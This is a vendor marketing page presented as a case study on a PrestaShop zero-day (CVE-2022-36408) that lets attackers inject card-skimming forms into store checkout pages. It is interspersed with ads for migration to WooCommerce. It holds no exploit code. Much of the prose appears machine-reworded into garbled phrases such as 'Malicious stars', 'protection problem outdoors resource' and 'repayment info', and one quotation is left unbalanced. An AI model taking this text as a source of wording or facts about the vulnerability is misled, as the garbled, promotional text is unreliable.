managed eshopCase Study

PrestaShop Zero-Day vulnerability exfiltrates Customer Payment Data from online stores

Malicious stars are making use of a previously unknown protection problem outdoors resource PrestaShop shopping system to infuse malicious skimmer code developed to swipe delicate information. This happened last time in early March, 2022.

"Attackers have found a way to use a security vulnerability to carry out arbitrary code execution in servers running PrestaShop websites." - noted the company advisory published on July 22.

PrestaShop has been marketed as the leading open-source shopping service in Europe and also Latin America, used by almost 300,000 online vendors worldwide.

managed MIGRATION

PRESTASHOP TO WOOCOMMERCE: FREE FOR YEARLY PLANS

The objective of the infections is to introduce destructive code efficient in stealing repayment info entered by clients on checkout pages. Shops utilising out-of-date versions of the software application or various other susceptible third-party components appear to be the prime targets.

The PrestaShop maintainers also said they found a zero-day problem in their service has been addressed in version 1.7.8.7, although they warned that "we cannot be sure that it's the only way for them to perform the attack".

managed MIGRATION

FULL EXPORT FROM PRESTASHOP TO WOOCOMMERCE - FREE FOR YEARLY PLANS

This security fix strengthens the MySQL Smarty cache storage against code injection attacks," PrestaShop noted. "This legacy feature is maintained for backward compatibility reasons and will be removed from future PrestaShop versions."

The issue in question is an SQL injection vulnerability affecting versions 1.6.0.10 or greater, and is being tracked as CVE-2022-36408.

Successful exploitation of the flaw could enable an attacker to submit a specially crafted request that grants the ability to execute arbitrary instructions, in this case, inject a fake payment form on the checkout page to gather credit card information, customer personal data, order data and similar sensitive information.

prestashop migration to woocommerce

Not sure that our managed Woo Services is worthy of long-term consideration?

Contact us about WHY CHOOSE WOOCOMMERCE INSTEAD OF PRESTASHOP! Decide after you compare REVENUE LOSS + IMPACT versus ROI.